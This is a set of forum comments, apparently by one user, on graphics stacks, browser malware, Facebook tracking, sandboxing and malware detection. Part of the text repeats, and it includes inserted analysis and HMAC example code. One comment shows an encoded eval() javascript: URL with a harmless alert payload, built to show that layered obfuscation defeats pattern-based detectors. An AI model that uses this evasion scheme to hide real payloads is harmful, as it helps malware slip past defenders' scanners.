Excuse the reply to self, just to clarify: OpenGL has contexts; these allow individual applications to be "resized, moved around" etc. OpenGL is not synonymous with "Full Screen Renderer."
Ah, see, that's the 800Lb invisible elephant in this discussion, It's there, no one sees it, but we're all talking around it in circles...
I've skimmed through and read most threads above, and it seems that few if any have realized one glaring fact: OpenGL has a Client / Server rendering model.
If we ditch the slow, non-hardware-accelerated 2D graphics API we can gain the performance and capabilities of 3D hardware, AND the ability to render remotely via OpenGL's client/server rendering model.
Considering that OpenGL was designed to allow display forking and render-farming, I'm not sure what people are talking about when they say things like: "if Wayland doesn't get the ability to display applications remotely".
It's not Wayland's job to render remotely, that's the renderer's job! Wayland relies on OpenGL; Client/Server OpenGL drivers can provide blazing fast remote rendering compared to standard VNC pixel scraping. OpenGL is platform independent, and can be used in places that X can't (on Windows). (Yes, you can run an X server layer on top of Windows, but why do so when OpenGL already exists at a lower level?)
Sure X can render remotely too, but if it's just going to be an added layer in the remote rendering stack, why even use it? One of the strong points of FOSS is the ability to choose between unfettered progress and stability. After a while the "bleeding edge" is wiped off and can be safely sheathed as just another tool we all use. Vendor lock in is the reason I ditched Windows. Hanging onto X because "Everything Runs On X" is exactly the opposite response I expected from FOSS users.
And how would you get a virus by just visiting websites?
By "visiting websites" I assume you mean downloading an HTML file along with its supporting data files such as sound, images, SVG / XML, video, PDFs (via plugin), etc, and displaying the combined content in a browser.
Go ahead and search the web for image/sound/video exploits in IE, Firefox, Safari, and any other browser.
For example, JPG image exploits can infect your computer with malware by simply attempting to decode an image.
Pssst: "Visiting websites" can cause JPG images to be decoded and displayed.
I'll second this. I'm reasonably careful - browse only with Firefox and a handful of extensions, don't use bootleg software, careful about executing anything (unsigned or unknown), and typically stay out of the darker areas of the net. I'd even go as far as to say I think I know what I'm doing.
I still got hit.
Windows users are insane.
"The definition of insanity is doing the same thing over and over and expecting different results." - Benjamin Franklin
Keep running the Most Targeted, and therefore most vulnerable OS. Keep "recovering" from crashes & viruses; Keep putting up with the fact that a constantly running A.V. is essential. Keep feeding the insanity because [insert your excuse here], and Windows is more familiar...
Except that it's not always more familiar. Most laymen I've encountered have just as much (if not more) trouble migrating from XP to Win7 as they do migrating to Linux or OSX.
Oh, right, it's AVG not MS that caused the crash... Tell me: Why was AVG's A.V. product installed? (Just plain insane, I tell you).
AV doesn't protect against most "Zero-Day" exploits; 1 month later your OS is patched against the known exploits... What then is the benefit of running an AV? It protects against unpatched flaws in your OS.
Psst: Instead of developing my own FOSS AV product, I just patch bugs in Linux...
Look at your TV, now back to me; Satellites run on solar power. Look out the window; now back to me; Plants run on solar power. Look at yourself, now back to me; We all depend on solar power in some form, solar is the original and greenest power. I ride to work on a horse.
...to look a bit more like this, Facebook users would have a better idea of what to expect?
Earlier I wrote:
Every time you see the Facebook button Just imagine in its place a knot-hole with a creepy Zuckerberg eye peering out (imaginary muffled fapping noise optional).
I get the impression that blocking/disabling third party cookies solves this, since the cookie is from facebook and I'm looking at $SITEXYZ.
Somewhat, however, fetching the Facebook scripts and/or images sends Facebook your IP & the page you are currently on via HTTP REFERER [sic]. This is not blocked by "blocking/disabling 3rd party cookies", if you're logged in to Facebook and you see a "like" button on another website Facebook knows you were there. If you're not logged in your IP + referring page goes to Facebook and previous login info along with basic link trail tracking or other analytics can probably identify you.
Every time you see the Facebook "like" button Just imagine in its place a knot-hole with a creepy Zuckerberg eye peering out (imaginary muffled fapping noise optional).
Seriously folks, Google's search results are a product of Google and are subject to their whim. They may provide mostly fair results, but does anyone seriously think that any search engine has perfectly fair results?
I don't see why they are obligated at all to treat all websites equally. In fact, I can't think of a single search engine that does treat all sites equal due to "adwords" and other such paid for advertising. Oh, I know, they're "labeled" as ads; Pffft, my grandma doesn't know that; She can't be convinced that the sponsored links aren't the top (and therefore "best") results. Strangely enough, she actually gets what she was searching for.
Screw "fair" results. Pure algorithmic results can and have been abused by link-farms. Google and other search engines manually de-rank link farms. I have personally reported such link-bait and watched them disappear from results the next day. BLAM, there goes your "pure algorithmic results".
Even if Google is being fair in this instance, it's best to search multiple engines.
Apps can only see other app's data through APIs that the apps implement. Apps can only access the data that they create, or that which is on the SD card. All other cross application data access is limited to apps that are signed via the same developer cert. A dev can make multiple apps that work together intimately (can see each other's data), but they must be from the same dev. Any other app from a different developer must use the application's public API.
Fact: The firefox installer can see & write to your whole hard drive. Fact: MS, Google & Apple installers can see & write to your whole hard drive (including directories containing FF's data).
Yes, I'm absolutely positive that neither Firefox nor Google/MS/Apple/Any applications are truly sandboxed on your OS. Proof? This Article Exists.
Define sandbox.
In my idea of a "sandbox" typing file:///sys/kernel/slab into the address bar should bring up an error page instead of my slabs...
Yeah, I know I can manually run FF under a chroot to create my own sandbox, but NO, FF DOES NOT DO THAT ITSELF.
Why is it even possible to make a plugin/addon install without the user getting asked?
Because all the apps can see each other's junk.
It's not Firefox's job to sandbox all the applications, that's really the OSs job.
In most desktop OSes, Much like the Internet, security was not a consideration among peers on the platform.
We've successfully migrated to multi-user security. The next step is already being taken via sandboxed applications: chroot, Android, iOS.
On an OS that sandboxes all applications, Firefox doesn't have to worry about protecting itself from outsiders, and it shouldn't have to worry about that now.
Applications shouldn't have to focus on features you require from your OS.
Besides, as long as all apps can touch each other's junk you can't have a proper sandbox as you describe. Certificates and Signing? Pfft. My malicious installer will just replace FF's keys and certs with ones I generate during installation, and I'll just re-sign the whole plugin system with the new keys. FF will see that everything is valid upon start up.
The only other option is requiring the user to input a password to "unlock" Firefox at startup. I already do this because my homepage has a password box, and I use a master password with my saved passwords, but for most users that is a big usability problem -- Remember Vista?
Re: toolbarqueries.clients.google.com -- Don't use Chrome. If you like Chrome use Chromium instead (open source base of Chrome minus secret closed source Google juices).
Re: googlebot -- Sitemaps be damned, use "robots.txt".
It is the fault of others for exploiting it?... How about they fix their exploits instead of pointing fingers.
IMO, this is not an "exploit". Dropping files into the plugins directory is easy by design.
Unwanted application side-effects are the fault of our current computing model whereby any application can see and touch any other application's junk.
To stop this sort of thing we need to change our application model to a sandboxed one, such as: *nix chroot, Android, iOS, etc. I really like Android's "Intents" (Applications can have a public API for talking to other applications).
The real issue at hand is that applications have access to data that we may not want them to access. Currently there is no option to tell our desktop OSs that we want all applications sandboxed, and any cross sandbox activity must be approved by the user.
With a sandboxed approach it will still be simple for the OS, users or developers to drop files into an application's plugin directory.
I can't trust that all applications will strictly follow the Filesystem Hierarchy Standard, and stay out of places they don't belong. Until then I'll keep using the chroot command and/or Virtualbox to create my own sandboxes.
"Encryption" is the wrong word here. What we're talking about is digital signing. The way it would work is that upon installation, the browser would generate a public-private keypair, encrypt the private key with a password of the user's choice, and save the resulting public key and encrypted private key to persistent storage.
No, what you are talking about involves Public-Key Cryptography, aka Encryption. Ergo, Encryption was the correct word in the GP, and you talk about using it extensively yourself.
Digital signatures can be generated without public key algorithms. The algorithms commonly used for signing data are called Message Digest or Fingerprinting algorithms.
MD5, SHA-1, SHA-256, and other such message digest algorithms can be used to digitally sign data.
Hashed Message Authentication Code (HMAC) can be used along with any digest algorithm in order to provide a keyed digest; An identical passphrase and input data is required to generate an identical digest/fingerprint.
Digital Certificates use both public key cryptography and message digest algorithms.
In any event, Encryption is involved, and is therefore not "the wrong word here".
The problem with this is that Assange will be prosecuted for his infidelity, but sentenced for pissing off world superpowers.
Hint: Interpol doesn't normally get involved in gray-area cases of Swedish latter day rape.
When in Rome! You have to deal with the laws where you reside.
In short: Do not do anything in any country if you are not 100% sure that it is legal to do so.
Pffft. Don't believe this "when in rome" crap. Hey, fellow Texan, did you know it's illegal to masturbate, women can't own more than 6 sex toys (intent to distribute obscene devices), and dildos are outright banned in Texas?
Ridiculous laws are ridiculous. Face it: Law does not reflect the actual public opinion or values. Since it's hard to remove old laws it's easy for the past to hold us prisoners. This is why we should only pass those laws that we really must have forever.
The problem with the Texas law is that it requires "the average person" to apply their own "standards" (read: right wing Christians dictate what's decent; Clearly a loophole bypassing Church/State separation).
IMO, non enforcement should be grounds for removal. The Swedish law of latter day rape is largely unenforced as well.
If the governments actually actively and aggressively enforced all the laws of the lands, laws like these would be much easier to overturn.
Unfortunately, law making branches are there to make new laws, they can't be bothered to audit the old ones -- If there are no lobbyists against the old laws, they stay on the books.
How to create a Police State:
1. Create laws that no one obeys.
2. Do not enforce said laws.
3. Wait for someone to do something you don't like.
4. Toss them in jail for breaking one of the laws you don't normally enforce.
5. Oppress!
And if you believe that, I'm sure that you're either a lawyer or, worse yet, a congressmember.
... or even worse still, a patent examiner.
TFA is wrong, Mozilla has not the right or capability to keep me from using FF in any way I want.
I compiled my OS & all the programs on it. Perhaps some FF users imagine themselves under the thumb of Mozilla?
Firefox is open source. If Mozilla refuses to add important features we want, me (or someone like me), will make them available to you in source and binary forms.
Everyone just chill out. If Mozilla is stupid enough to force this crap on its users, competitors will spring up instantly that offer everything Firefox does as well as the privacy tools too (note: there are already forks of FF available, if you care to search).
IMO, Some jag-off is blabbing on the Internet about shit they know nothing about again, BFD. Nothing to see here, move along.
Yep, one of my friends just tagged me in a picture he took of a nude Jamaican sculpture... That's right, I'm the penis... WTF, Facebook. My friends are NOT me, they should not decide what's on my profile page.
Hahahah, even your correction has mathematical error ;-P
Software that is 50% complete and ships provides infinitely more functionality to users than software that strives for 100% completeness but never gets shipped.
FTFY
Think about it: shipped to users = (X functionality units) not shipped = (0 functionality units). You're talking percents, not quantized units of functionality. Any positive X is infinity percent greater than 0.
What isn't realized is that I have about 20 half finished (not shipped) projects in my personal repository. I regularly "ship" a product that uses modules developed for another unshipped project.
Therefore:
Software that is 100% complete and ships may provide functionality to users from software that strives for 100% completeness but never gets shipped.
...and...
Software that is 50% complete and ships provides 50% less functionality to users than software that is 100% complete and built with modules from software that never gets shipped.
The important thing to remember is: Try to make code reusable, the current project might not ship; If so you won't have wasted all of your time.
The internet isn't really a place to gain an informed opinion over things.
Yes, you are correct. Opinions should all be tossed out. Pure info is what the Internet is all about. Pick a language and a FOSS project, develop away, it's a great learning process that I've found much more "educational" than formal education.
Teach yourself C++: C++ Annotations, C++ Language Tutorial... ... or Perl: Perl programming documentation, or JavaScript,
or Java.
Just search the web, you'll find everything that any professor will ever be able to teach you online. Need guidance, clarification, or to ask a question? There are free online forums for that too... Yes, the Internet on average, much like the FM band, has more signal than noise, but similarly you can easily tune in to the signal you need.
Consider this: My Java "professor" gave an assignment where we read in rows of data from standard input, and output the table sorted by a certain column's value. He offered extra credit for proper alignment and justification of the table's cells... "WTF? Really?", I thought.
I used the Collections framework along with Swing to provide a GUI w/ sortable & justified JTable columns instead of doing character counting and sending extra spaces with the text to the standard output. He gave me a C. Another student used the Formatter to provide printf style formatting... also got a C, WTF! Go beyond the prof's teachings & expectations to meet a requirement, get a poor grade... That's dumb and counter productive.
In the real world, you try not to re-invent the wheel, this college course was not teaching practical programming; It was so far beneath what I learned already online, on Java's own website, I dropped the course (waste of time). Sure I can write a merge sort, or programmatically align console text output, but that was not what the assignment said: "Provide a tabular output sorted by the 'Name' column." We learned merge sort 2 weeks prior, but the "professor" would not move on.
Not having a "degree" myself, I frequently answer questions that "Degree" holding graduates ask in online forums... Why? Because they didn't learn what they needed to know in their courses.
You would be hard pressed to find a programmer that doesn't have some form of documentation open in another window, screen, or context menu while coding. IMO, besides learning about algorithms and complexity, the language specs & online tutorials are all you really need. I find paper books pale in comparison to down-loadable, copy&paste-able free, online resources. Also note: As a programmer you will be expected to keep up to date with the ever changing languages you learn. All of these changes are easily accessible online too.
There's a lot of noise and very little quality signal to use and without having a degree to start with it's pretty much futile in terms of knowing what is and is not reliable information.
I call bullshit. See esp. the Java link above, your arguments are ill-informed, and reek of FUD. Search google for "java tutorial", or "$any_lang tutorial" and you get some pretty damn reliable, pure "signal" information about what you searched for.
Are you really arguing that Language specs & Tutorials from IBM, Microsoft, etc, and docs from a language's main website (such as http://perldoc.perl.org/
When I use NoScript to disable JS for a website, at least I have control over it.
Yeah, sure you do... Funny thing about NoScript, it allows you to run JS on sites you trust.
This is just more security theater; Consider cross site scripting attacks. I've seen XSS attacks on Google, Microsoft, Twitter, Amazon, and many more "reputable" sites that you may "trust".
NoScript security comes from not running JS. If you run any JS, you are then no longer secure. How do you know the JS you just allowed to run on a "trusted" site doesn't contain malware delivered via XSS? You Don't.
Granted, NoScript does increase your security because you're running less JS code, but it does not make you invulnerable to JS exploits unless you never allow JS to run.
The "control" you think you have can be ripped away from you by one XSS attack; So, what control do you actually have?
FTA: "ZOZZLE makes use of a statistical classifier to efficiently identify malicious JavaScript. The classifier needs training data to accurately classify JavaScript source"
It seems that they're using Bayesian (or other) classification techniques like those in spam identification tools. One wonders what percentage of false alarms are going to be set off. When I use NoScript to disable JS for a website, at least I have control over it.
This is a useless endeavor. There is an infinite number of ways to do the same damn thing in JS.
Consider the following:
javascript:function%20u64%28s%29%7Bvar%20h%2Co%2Cb%2Cc%2Cp%3Bb%3Dc%3Dp%3D0%3Bo%3D%22%22%3Bwhile%28p%3Cs.length%29%7Bh%3Ds.charCodeAt%28p%29-47%3Bif%28h%3C0%29h%3D0%3Bif%28h%3E10%29h-%3D7%3Bif%28h%3E36%29h-%3D4%3Bif%28h%3E37%29h-%3D1%3Bb%3D%28b%3C%3C6%29%7Ch%3Bc+%3D6%3Bp++%3Bwhile%28c%3E6%29%7Bo+%3DString.fromCharCode%28%28b%3E%3E%28c-7%29%29%26127%29%3Bc-%3D7%7D%7Dreturn%20o%7D%3Beval%28u64%28%22kvBjAccIoBEId_tQZ3IAomsyabUiFHTP1bouwCDGRbJik%22%29%29%3Bvoid%280%29%3B
This is valid JavaScript. It is equivalent to pasting the following into your address bar:
javascript:alert('Pattern Detection Is Stupid.');
JS has an eval() function. Game over folks. You can encrypt your code, and decrypt it on the fly, then eval it. The above code uses URL encoding and Base64. The above code contains a Base64 decoder along with the data to decode. A base64 encoder/decoder pair can be generated on the fly; each will use a non standard scrambled alphabet.
Base64 was used for simplicity, but RSA, multiple "URL escape" passes, or any other combination of ciphers can be used. Bonus: Ajax can be used to fetch the decryption key which makes it impossible to decode the JS unless the JS is running. Any solution complex enough to detect all JS malware would be equally complex as the JS engine itself.
I can hear some gears beginning to turn: "just intercept the eval calls".
Wrong.
Consider this:
document.write( 'alert("Pattern Detection Is Stupid.");' );
You can use document.write to output more JS, that will then be interpreted after the current script block.
The output JS, can decode a bit more JS and run it via eval and/or output it again. As many layers as you like can be used. Code can also be obfuscated server side on the fly.
Fix the engine, don't add a filter for it because it's insecure! This is more security theater, just like TSA. We protect against known threats, the evil doers just think of a new way each time that we aren't protecting ourselves against yet. MS should be hardening their JS engine, but code auditing seems to be too much work for them (too bad it's not open source). The solution to terrorist bombs is not TSA, it is Explosion Proof Planes & fully automated cockpits (big red button to enable full autopilot). The solution to JS exploits is an Exploit Proof JS Engine & fully isolated VM.
IMO, JS should be properly sandboxed or ditched altogether. For the sake of speed modern browsers compile JS into machine code and run it directly on the metal... That's right folks, all your JS code is inherently a remote code execution!
Hint: Any code running directly on the metal can not be properly sandboxed unless you use a VM.
If we're not going to use the hardware VM features we shouldn't be running JS on the metal or you risk an error causing a remote execution exploit.
A simple software VM would be ideal, but a software VM for JS must be complex, and almost as inefficient as interpreting and executing the code inline.
tl;dr: Ditch JS or Sandbox it in a proper VM. Until then our human errors in the JS engines will always lead to vulnerabilities.
Note: If it's not in a VM, I won't ever consider the code to be "sandboxed".
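For the encoded javascript: URL quoted earlier in this thread, an added example (not part of the original comments) that peels each layer without executing anything and records at which layer a pattern filter could first see the call. The signature regexes and the function names `matchSignatures` and `peelLayers` are assumptions made for this example; `u64` re-implements the decoder embedded in the quoted URL.

```javascript
// The javascript: URL quoted in the comment, copied verbatim.
const QUOTED_URL = "javascript:function%20u64%28s%29%7Bvar%20h%2Co%2Cb%2Cc%2Cp%3Bb%3Dc%3Dp%3D0%3Bo%3D%22%22%3Bwhile%28p%3Cs.length%29%7Bh%3Ds.charCodeAt%28p%29-47%3Bif%28h%3C0%29h%3D0%3Bif%28h%3E10%29h-%3D7%3Bif%28h%3E36%29h-%3D4%3Bif%28h%3E37%29h-%3D1%3Bb%3D%28b%3C%3C6%29%7Ch%3Bc+%3D6%3Bp++%3Bwhile%28c%3E6%29%7Bo+%3DString.fromCharCode%28%28b%3E%3E%28c-7%29%29%26127%29%3Bc-%3D7%7D%7Dreturn%20o%7D%3Beval%28u64%28%22kvBjAccIoBEId_tQZ3IAomsyabUiFHTP1bouwCDGRbJik%22%29%29%3Bvoid%280%29%3B";

// Patterns a naive static filter might look for (constructed for this example).
const SIGNATURES = { alertCall: /alert\s*\(/, evalCall: /eval\s*\(/ };

function matchSignatures(text) {
  return Object.keys(SIGNATURES).filter((name) => SIGNATURES[name].test(text));
}

// The decoder from the quoted URL: a custom 6-bit alphabet repacked into
// 7-bit characters. It only returns a string; nothing is evaluated.
function u64(s) {
  let b = 0, c = 0, o = "";
  for (let p = 0; p < s.length; p++) {
    let h = s.charCodeAt(p) - 47;
    if (h < 0) h = 0;
    if (h > 10) h -= 7;
    if (h > 36) h -= 4;
    if (h > 37) h -= 1;
    b = (b << 6) | h;
    c += 6;
    while (c > 6) {
      o += String.fromCharCode((b >> (c - 7)) & 127);
      c -= 7;
    }
  }
  return o;
}

// Follow the same layers the browser would, recording which signatures are
// visible in the text at each one.
function peelLayers(url) {
  const layers = [{ name: "raw", text: url }];
  const decoded = decodeURIComponent(url);
  layers.push({ name: "percent-decoded", text: decoded });
  const arg = /eval\(u64\("([^"]*)"\)\)/.exec(decoded);
  if (arg) layers.push({ name: "u64-decoded", text: u64(arg[1]) });
  return layers.map((l) => ({ ...l, hits: matchSignatures(l.text) }));
}

for (const layer of peelLayers(QUOTED_URL)) {
  console.log(layer.name.padEnd(16), JSON.stringify(layer.hits));
}
```

The raw URL matches neither pattern, the percent-decoded layer shows only the eval call, and the call itself becomes visible only after the page-specific decoder has been reproduced.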
Following exact patterns work because that generates the same exact pseudo-random number pool that the ghosts use to pick directions.
Excuse the reply to self, just to clarify: OpenGL has contexts; these allow individual applications to be "resized, moved around" etc. OpenGL is not synonymous with "Full Screen Renderer."
Ah, see, that's the 800Lb invisible elephant in this discussion, It's there, no one sees it, but we're all talking around it in circles...
I've skimmed through and read most threads above, and it seems that few if any have realized one glaring fact:
OpenGL has a Client / Server rendering model.
If we ditch the slow, non-hardware-accelerated 2D graphics API we can gain the performance and capabilities of 3D hardware, AND the ability to render remotely via OpenGL's client/server rendering model.
Considering that OpenGL was designed to allow display forking and render-farming, I'm not sure what people are talking about when they say things like: "if Wayland doesn't get the ability to display applications remotely".
It's not Wayland's job to render remotely, that's the renderer's job! Wayland relies on OpenGL; Client/Server OpenGL drivers can provide blazing fast remote rendering compared to standard VNC pixel scraping. OpenGL is platform independent, and can be used in places that X can't (on Windows). (Yes, you can run an X server layer on top of Windows, but why do so when OpenGL already exists at a lower level?)
Sure X can render remotely too, but if it's just going to be an added layer in the remote rendering stack, why even use it? One of the strong points of FOSS is the ability to choose between unfettered progress and stability. After a while the "bleeding edge" is wiped off and can be safely sheathed as just another tool we all use. Vendor lock in is the reason I ditched Windows. Hanging onto X because "Everything Runs On X" is exactly the opposite response I expected from FOSS users.
We need OpenGL drivers for hardware acceleration anyway (Hell, even phones have OpenGL now), and OpenGL enables remote rendering. Search for yourself
And how would you get a virus by just visiting websites?
By "visiting websites" I assume you mean downloading an HTML file along with its supporting data files such as sound, images, SVG / XML, video, PDFs (via plugin), etc, and displaying the combined content in a browser.
Go ahead and search the web for image/sound/video exploits in IE, Firefox, Safari, and any other browser.
For example, JPG image exploits can infect your computer with malware by simply attempting to decode an image.
Pssst: "Visiting websites" can cause JPG images to be decoded and displayed.
I'll second this. I'm reasonably careful - browse only with Firefox and a handful of extensions, don't use bootleg software, careful about executing anything (unsigned or unknown), and typically stay out of the darker areas of the net. I'd even go as far as to say I think I know what I'm doing.
I still got hit.
Windows users are insane.
"The definition of insanity is doing the same thing over and over and expecting different results." - Benjamin Franklin
Keep running the Most Targeted, and therefore most vulnerable OS. Keep "recovering" from crashes & viruses; Keep putting up with the fact that a constantly running A.V. is essential. Keep feeding the insanity because [insert your excuse here], and Windows is more familiar...
Except that It's not always more familiar. Most laymen I've encountered have just as much (if not more) trouble migrating from XP to Win7 as they do migrating to Linux or OSX.
Oh, right, it's AVG not MS that caused the crash... Tell me: Why was AVG's A.V. product installed? (Just plain insane, I tell you).
AV doesn't protect against most "Zero-Day" exploits; 1 month later your OS is patched against the known exploits... What then is the benefit of running an AV? It protects against unpatched flaws in your OS.
Psst: Instead of developing my own FOSS AV product, I just patch bugs in Linux...
Look at your TV, now back to me; Satellites run on solar power. Look out the window; now back to me; Plants run on solar power. Look at yourself, now back to me; We all depend on solar power in some form, solar is the original and greenest power. I ride to work on a horse.
Don't click those buttons!
It's not so simple as that. Just the fact that you can see the button is enough to let Facebook track you.
...to look a bit more like this, Facebook users would have a better idea of what to expect?
Earlier I wrote:
Every time you see the Facebook button Just imagine in its place a knot-hole with a creepy Zuckerberg eye peering out (imaginary muffled fapping noise optional).
Feel free to add it to your sites!
I get the impression that blocking/disabling third party cookies solves this, since the cookie is from facebook and I'm looking at $SITEXYZ.
Somewhat, however, fetching the Facebook scripts and/or images sends Facebook your IP & the page you are currently on via HTTP REFERER [sic]. This is not blocked by "blocking/disabling 3rd party cookies", if you're logged in to Facebook and you see a "like" button on another website Facebook knows you were there. If you're not logged in your IP + referring page goes to Facebook and previous login info along with basic link trail tracking or other analytics can probably identify you.
Every time you see the Facebook "like" button Just imagine in its place a knot-hole with a creepy Zuckerberg eye peering out (imaginary muffled fapping noise optional).
Seriously folks, Google's search results are a product of Google and are subject to their whim. They may provide mostly fair results, but does anyone seriously think that any search engine has perfectly fair results?
I don't see why they are obligated at all to treat all websites equally.
In fact, I can't think of a single search engine that does treat all sites equal due to "adwords" and other such paid for advertising. Oh, I know, they're "labeled" as ads; Pffft, my grandma doesn't know that; She can't be convinced that the sponsored links aren't the top (and therefore "best") results. Strangely enough, she actually gets what she was searching for.
Screw "fair" results. Pure algorithmic results can and have been abused by link-farms. Google and other search engines manually de-rank link farms. I have personally reported such link-bait and watched them disappear from results the next day. BLAM, there goes your "pure algorithmic results".
Even if Google is being fair in this instance, it's best to search multiple engines.
If only there was some service that allowed me to search multiple engines at once.
You would think that someone would create a Firefox plugin that does this...
Seriously, this is a non issue.
I agree.
This is very similar to what Android does.
Apps can only see other apps' data through APIs that the apps implement. Apps can only access the data that they create, or that which is on the SD card. All other cross application data access is limited to apps that are signed via the same developer cert. A dev can make multiple apps that work together intimately (can see each other's data), but they must be from the same dev. Any other app from a different developer must use the application's public API.
I don't "claim" anything. I'm stating facts.
Fact: The firefox installer can see & write to your whole hard drive.
Fact: MS, Google & Apple installers can see & write to your whole hard drive (including directories containing FF's data).
Yes, I'm absolutely positive that neither Firefox nor Google/MS/Apple/Any applications are truly sandboxed on your OS. Proof? This Article Exists.
Define sandbox.
In my idea of a "sandbox" typing file:///sys/kernel/slab into the address bar should bring up an error page instead of my slabs...
Yeah, I know I can manually run FF under a chroot to create my own sandbox, but NO, FF DOES NOT DO THAT ITSELF.
Why is it even possible to make a plugin/addon install without the user getting asked?
Because all the apps can see each other's junk.
It's not Firefox's job to sandbox all the applications, that's really the OSs job.
In most desktop OSes, Much like the Internet, security was not a consideration among peers on the platform.
We've successfully migrated to multi-user security. The next step is already being taken via sandboxed applications: chroot, Android, iOS.
On an OS that sandboxes all applications, Firefox doesn't have to worry about protecting itself from outsiders, and it shouldn't have to worry about that now.
Applications shouldn't have to focus on features you require from your OS.
Besides, as long as all apps can touch each other's junk you can't have a proper sandbox as you describe. Certificates and Signing? Pfft. My malicious installer will just replace FF's keys and certs with ones I generate during installation, and I'll just re-sign the whole plugin system with the new keys. FF will see that everything is valid upon start up.
The only other option is requiring the user to input a password to "unlock" Firefox at startup. I already do this because my homepage has a password box, and I use a master password with my saved passwords, but for most users that is a big usability problem -- Remember Vista?
Re: toolbarqueries.clients.google.com -- Don't use Chrome. If you like Chrome use Chromium instead (open source base of Chrome minus secret closed source Google juices).
Re: googlebot -- Sitemaps be damned, use "robots.txt".
It is the fault of others for exploiting it? ...
How about they fix their exploits instead of pointing fingers.
IMO, this is not an "exploit". Dropping files into the plugins directory is easy by design.
Unwanted application side-effects are the fault of our current computing model whereby any application can see and touch any other application's junk.
To stop this sort of thing we need to change our application model to a sandboxed one, such as: *nix chroot, Android, iOS, etc. I really like Android's "Intents" (Applications can have a public API for talking to other applications).
The real issue at hand is that applications have access to data that we may not want them to access. Currently there is no option to tell our desktop OSs that we want all applications sandboxed, and any cross sandbox activity must be approved by the user.
With a sandboxed approach it will still be simple for the OS, users or developers to drop files into an application's plugin directory.
I can't trust that all applications will strictly follow the Filesystem Hierarchy Standard, and stay out of places they don't belong. Until then I'll keep using the chroot command and/or Virtualbox to create my own sandboxes.
"Encryption" is the wrong word here. What we're talking about is digital signing. The way it would work is that upon installation, the browser would generate a public-private keypair, encrypt the private key with a password of the user's choice, and save the resulting public key and encrypted private key to persistent storage.
No, what you are talking about involves Public-Key Cryptography, aka Encryption. Ergo, Encryption was the correct word in the GP, and you talk about using it extensively yourself.
Digital signatures can be generated without public key algorithms. The algorithms commonly used for signing data are called Message Digest or Fingerprinting algorithms.
MD5, SHA-1, SHA-256, and other such message digest algorithms can be used to digitally sign data.
Hashed Message Authentication Code (HMAC) can be used along with any digest algorithm in order to provide a keyed digest; An identical passphrase and input data is required to generate an identical digest/fingerprint.
Digital Certificates use both public key cryptography and message digest algorithms.
In any event, Encryption is involved, and is therefore not "the wrong word here".
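The keyed digest mentioned in the comment above, as an added example that is not part of the original post: an unkeyed SHA-256 fingerprint stored beside a plugin file can be rewritten by whoever rewrites the file, while an HMAC tag only verifies for someone holding the passphrase-derived key. The plugin contents, passphrases, salt, iteration count and function names are all constructed for this example.

```javascript
const nodeCrypto = require("node:crypto");

// Constructed sample data: a plugin file as installed, and a modified copy.
const ORIGINAL = Buffer.from("plugin v1: render_bookmarks()");
const MODIFIED = Buffer.from("plugin v1: render_bookmarks(); extra_toolbar()");

// Unkeyed fingerprint check: recompute SHA-256 and compare with the stored hex.
function plainDigest(data) {
  return nodeCrypto.createHash("sha256").update(data).digest("hex");
}
function checkPlain(data, storedHex) {
  return plainDigest(data) === storedHex;
}

// HMAC key derived from the user's passphrase (parameters are assumptions).
function deriveKey(passphrase, salt) {
  return nodeCrypto.pbkdf2Sync(passphrase, salt, 200000, 32, "sha256");
}

// Keyed digest: HMAC-SHA-256 over the file contents.
function keyedTag(key, data) {
  return nodeCrypto.createHmac("sha256", key).update(data).digest();
}

// Compare the stored tag with a freshly computed one in constant time.
function verify(key, data, storedTag) {
  const fresh = keyedTag(key, data);
  return fresh.length === storedTag.length &&
    nodeCrypto.timingSafeEqual(fresh, storedTag);
}

function demo() {
  const salt = Buffer.from("constructed-salt-0001");
  const userKey = deriveKey("correct horse battery staple", salt);
  const storedTag = keyedTag(userKey, ORIGINAL);
  // Another program with write access replaces the file and whatever is
  // stored next to it, but has to guess at the passphrase.
  const guessedKey = deriveKey("not the passphrase", salt);
  return {
    plainCheckAfterRewrite: checkPlain(MODIFIED, plainDigest(MODIFIED)),
    originalVerifies: verify(userKey, ORIGINAL, storedTag),
    modifiedWithOldTag: verify(userKey, MODIFIED, storedTag),
    modifiedWithForgedTag: verify(userKey, MODIFIED, keyedTag(guessedKey, MODIFIED)),
  };
}

console.log(demo());
```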